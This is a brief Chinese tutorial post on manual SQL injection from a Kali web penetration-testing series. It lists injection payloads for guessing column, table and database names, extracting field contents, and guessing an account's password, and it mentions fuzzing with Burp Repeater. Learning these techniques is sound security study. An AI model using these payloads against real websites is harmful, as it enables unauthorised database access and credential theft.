【Kali Web滲透測試】手動漏洞挖掘—SQL注入 猜測數據庫列名、表名、庫名、字段內容

原創 Dalvin_jean 2018-08-26 23:55

1. 列名、表名、庫名

' and user is null--+

' and table.user is null--+

' and db.table.user is null--+

用burp截獲http GET請求,發送到repeater,變量加$, load字典(字典可從kali中獲取(find / -name *column*.txt))

' and (select count(*) from table)>0--+    //猜數據庫裏其它的表

2. 字段內容

' or user = 'admin+   //user字段,user是通過猜列名得到的正確結果

' or user like '%a%   //構造SQL模糊查詢語句

3. 猜賬號對應密碼

' or user='admin' and password='MD5值


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

redtigerSQL注入

一生所爱丶 2018-08-27 13:00:31

【Kali Web滲透測試】手動漏洞挖掘——複雜語句查詢&讀寫文件和下載數據庫

Dalvin_jean 2018-08-26 23:55:29

實驗吧-因缺思汀的繞過

LDDP 2018-08-26 04:35:31

sql注入--入門篇

n4nch3ng 2018-08-25 21:51:51

SQL注入學習 -- sqli-labs lesson 1

L1am3s 2018-08-25 18:45:13

SQL注入--盲注入(bool型)

liukenn 2018-08-25 01:27:54

SQL注入--GET注入

liukenn 2018-08-25 01:27:54

SQL注入--盲注入(time型)

liukenn 2018-08-25 01:27:41

SQL注入--報錯注入

liukenn 2018-08-25 01:27:40

SQL注入學習(一)

tata_qing 2018-08-24 11:27:54

SQL注入-文件操作

斯利普 2018-08-24 06:42:54

SQL注入-盲注

斯利普 2018-08-24 06:42:54

SQL注入-有回顯的注入

斯利普 2018-08-24 06:42:54

SQL注入-注入點判斷

斯利普 2018-08-24 06:42:53

SQL注入-寬字節注入

斯利普 2018-08-24 06:42:37